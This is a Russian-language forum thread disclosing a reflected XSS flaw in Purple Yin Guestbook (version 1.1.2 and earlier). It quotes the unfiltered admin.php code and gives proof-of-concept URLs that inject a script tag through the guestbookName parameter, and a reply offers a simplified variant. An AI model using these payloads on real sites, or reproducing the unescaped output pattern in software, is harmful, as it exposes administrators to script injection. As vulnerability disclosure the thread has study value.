Пассивные XSS в Purple Yin Guestbook Version <=1.1.2

Discussion in 'Уязвимости' started by 1ten0.0net1, 23 Sep 2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения.

    Пример бажного кода admin.php:

    $guestbookName=GUESTBOOK_NAME;
    .....
    <td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>

    Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.


    Proof of concept:

    http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

    Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.

    P. S. Работает в Internet Explorer
     
    #1 1ten0.0net1, 23 Sep 2006
    Last edited: 23 Sep 2006
    1 person likes this.
  2. [hidden]

    [hidden] Elder - Старейшина

    Joined:
    5 Nov 2005
    Messages:
    70
    Likes Received:
    19
    Reputations:
    7
    Может, я чего-то не догоняю, но если заходить по адресу

    http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

    то это преобразуется в

    <td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td>

    Может, можно обойтись

    http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ?

    Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..
     
  3. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Пригодиться!